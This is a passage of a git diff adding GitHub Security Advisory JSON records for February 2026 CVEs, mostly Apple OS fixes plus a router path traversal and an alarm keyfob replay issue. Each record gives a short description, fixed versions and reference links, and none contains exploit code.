"https://nvd.nist.gov/vuln/detail/CVE-2026-20614" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json b/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json new file mode 100644 index 0000000000000..13093bcbac1ec --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hxp3-qj63-m9j9", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20602" + ], + "details": "The issue was addressed with improved handling of caches. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4. An app may be able to cause a denial-of-service.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20602" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json b/advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json new file mode 100644 index 0000000000000..afdeb6d072c82 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j5x8-2r52-c3ff", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20700" + ], + "details": "A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An attacker with memory write capability may be able to execute arbitrary code. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-14174 and CVE-2025-43529 were also issued in response to this report.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20700" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jhp8-jfxv-5ggj/GHSA-jhp8-jfxv-5ggj.json b/advisories/unreviewed/2026/02/GHSA-jhp8-jfxv-5ggj/GHSA-jhp8-jfxv-5ggj.json new file mode 100644 index 0000000000000..619ef446768cc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jhp8-jfxv-5ggj/GHSA-jhp8-jfxv-5ggj.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jhp8-jfxv-5ggj", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20652" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Tahoe 26.3, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. A remote attacker may be able to cause a denial-of-service.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20652" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126354" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json b/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json new file mode 100644 index 0000000000000..200deaa254608 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jhq4-533p-8p4c", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2026-20608" + ], + "details": "This issue was addressed through improved state management. This issue is fixed in macOS Tahoe 26.3, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. Processing maliciously crafted web content may lead to an unexpected process crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20608" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126354" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m4mv-q6m2-24j4/GHSA-m4mv-q6m2-24j4.json b/advisories/unreviewed/2026/02/GHSA-m4mv-q6m2-24j4/GHSA-m4mv-q6m2-24j4.json new file mode 100644 index 0000000000000..613d8a1b752a2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m4mv-q6m2-24j4/GHSA-m4mv-q6m2-24j4.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m4mv-q6m2-24j4", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-46302" + ], + "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46302" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mfw9-vjxf-gvr8/GHSA-mfw9-vjxf-gvr8.json b/advisories/unreviewed/2026/02/GHSA-mfw9-vjxf-gvr8/GHSA-mfw9-vjxf-gvr8.json index 592ca3d319e28..b195bcb653442 100644 --- a/advisories/unreviewed/2026/02/GHSA-mfw9-vjxf-gvr8/GHSA-mfw9-vjxf-gvr8.json +++ b/advisories/unreviewed/2026/02/GHSA-mfw9-vjxf-gvr8/GHSA-mfw9-vjxf-gvr8.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-1327" + "CWE-1327", + "CWE-668" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-mg2x-vmw2-xm7h/GHSA-mg2x-vmw2-xm7h.json b/advisories/unreviewed/2026/02/GHSA-mg2x-vmw2-xm7h/GHSA-mg2x-vmw2-xm7h.json new file mode 100644 index 0000000000000..11998ff6948d1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mg2x-vmw2-xm7h/GHSA-mg2x-vmw2-xm7h.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg2x-vmw2-xm7h", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-46304" + ], + "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46304" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json b/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json new file mode 100644 index 0000000000000..fd782e26d81f6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p47v-wp9g-8362", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20609" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20609" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p8ww-f2v2-hj7q/GHSA-p8ww-f2v2-hj7q.json b/advisories/unreviewed/2026/02/GHSA-p8ww-f2v2-hj7q/GHSA-p8ww-f2v2-hj7q.json new file mode 100644 index 0000000000000..c6302b82e675b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p8ww-f2v2-hj7q/GHSA-p8ww-f2v2-hj7q.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p8ww-f2v2-hj7q", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20638" + ], + "details": "A logic issue was addressed with improved checks. This issue is fixed in iOS 26.3 and iPadOS 26.3. A user with Live Caller ID app extensions turned off could have identifying information leaked to the extensions.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20638" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json new file mode 100644 index 0000000000000..a5046795fef0a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmfg-h9xp-96jh", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20675" + ], + "details": "The issue was addressed with improved bounds checks. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted image may lead to disclosure of user information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20675" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pr6p-6x97-5c59/GHSA-pr6p-6x97-5c59.json b/advisories/unreviewed/2026/02/GHSA-pr6p-6x97-5c59/GHSA-pr6p-6x97-5c59.json new file mode 100644 index 0000000000000..188f29d649676 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pr6p-6x97-5c59/GHSA-pr6p-6x97-5c59.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pr6p-6x97-5c59", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-46310" + ], + "details": "This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.7.4, macOS Sonoma 14.8.4. An attacker with root privileges may be able to delete protected system files.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46310" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pxhf-qg7h-8x8m/GHSA-pxhf-qg7h-8x8m.json b/advisories/unreviewed/2026/02/GHSA-pxhf-qg7h-8x8m/GHSA-pxhf-qg7h-8x8m.json new file mode 100644 index 0000000000000..e7f92e6c59a1e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pxhf-qg7h-8x8m/GHSA-pxhf-qg7h-8x8m.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxhf-qg7h-8x8m", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20644" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Tahoe 26.3, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. Processing maliciously crafted web content may lead to an unexpected process crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20644" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126354" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json new file mode 100644 index 0000000000000..cb08bec5ecdad --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q5q3-fgwr-rr9h", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20621" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to cause unexpected system termination or corrupt kernel memory.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20621" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qg96-wxg3-3x3h/GHSA-qg96-wxg3-3x3h.json b/advisories/unreviewed/2026/02/GHSA-qg96-wxg3-3x3h/GHSA-qg96-wxg3-3x3h.json new file mode 100644 index 0000000000000..e5f141a6c8ccc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qg96-wxg3-3x3h/GHSA-qg96-wxg3-3x3h.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qg96-wxg3-3x3h", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20625" + ], + "details": "A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4, visionOS 26.3. An app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20625" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json b/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json new file mode 100644 index 0000000000000..1fadc75a8ff34 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qjq9-mpcc-f8cr", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20677" + ], + "details": "A race condition was addressed with improved handling of symbolic links. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. A shortcut may be able to bypass sandbox restrictions.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20677" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq3h-f6g7-3484/GHSA-qq3h-f6g7-3484.json b/advisories/unreviewed/2026/02/GHSA-qq3h-f6g7-3484/GHSA-qq3h-f6g7-3484.json new file mode 100644 index 0000000000000..9437c2b5b8f04 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq3h-f6g7-3484/GHSA-qq3h-f6g7-3484.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq3h-f6g7-3484", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-64074" + ], + "details": "A path-traversal vulnerability in the logout functionality of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote attackers to delete arbitrary files on the host by supplying a crafted session cookie value.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64074" + }, + { + "type": "WEB", + "url": "https://neutsec.io/advisories/cve-2025-64074" + }, + { + "type": "WEB", + "url": "https://www.zbtwifi.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r28c-wjwj-4xgv/GHSA-r28c-wjwj-4xgv.json b/advisories/unreviewed/2026/02/GHSA-r28c-wjwj-4xgv/GHSA-r28c-wjwj-4xgv.json new file mode 100644 index 0000000000000..344caa9c84697 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r28c-wjwj-4xgv/GHSA-r28c-wjwj-4xgv.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r28c-wjwj-4xgv", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-67135" + ], + "details": "Weak Security in the PF-50 1.2 keyfob of PGST PG107 Alarm System 1.25.05.hf allows attackers to compromise access control via a code replay attack.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67135" + }, + { + "type": "WEB", + "url": "https://neutsec.io/advisories/cve-2025-67135" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r2c9-g9pr-hc37/GHSA-r2c9-g9pr-hc37.json b/advisories/unreviewed/2026/02/GHSA-r2c9-g9pr-hc37/GHSA-r2c9-g9pr-hc37.json new file mode 100644 index 0000000000000..84985bc3b762c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r2c9-g9pr-hc37/GHSA-r2c9-g9pr-hc37.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r2c9-g9pr-hc37", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20601" + ], + "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.3. An app may be able to monitor keystrokes without user permission.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20601" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json b/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json new file mode 100644 index 0000000000000..01e122e5c3ef9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5cf-37x9-4hgv", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20658" + ], + "details": "A package validation issue was addressed by blocking the vulnerable package. This issue is fixed in macOS Tahoe 26.3. An app may be able to gain root privileges.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20658" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r7jp-3wp4-fvf4/GHSA-r7jp-3wp4-fvf4.json b/advisories/unreviewed/2026/02/GHSA-r7jp-3wp4-fvf4/GHSA-r7jp-3wp4-fvf4.json new file mode 100644 index 0000000000000..a6a60f3a00191 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r7jp-3wp4-fvf4/GHSA-r7jp-3wp4-fvf4.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r7jp-3wp4-fvf4", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20629" + ], + "details": "A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Tahoe 26.3. An app may be able to access user-sensitive data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20629" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json b/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json new file mode 100644 index 0000000000000..05ed090a571ef --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r942-7mj9-p58w", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20663" + ], + "details": "The issue was resolved by sanitizing logging. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An app may be able to enumerate a user's installed apps.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20663" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + 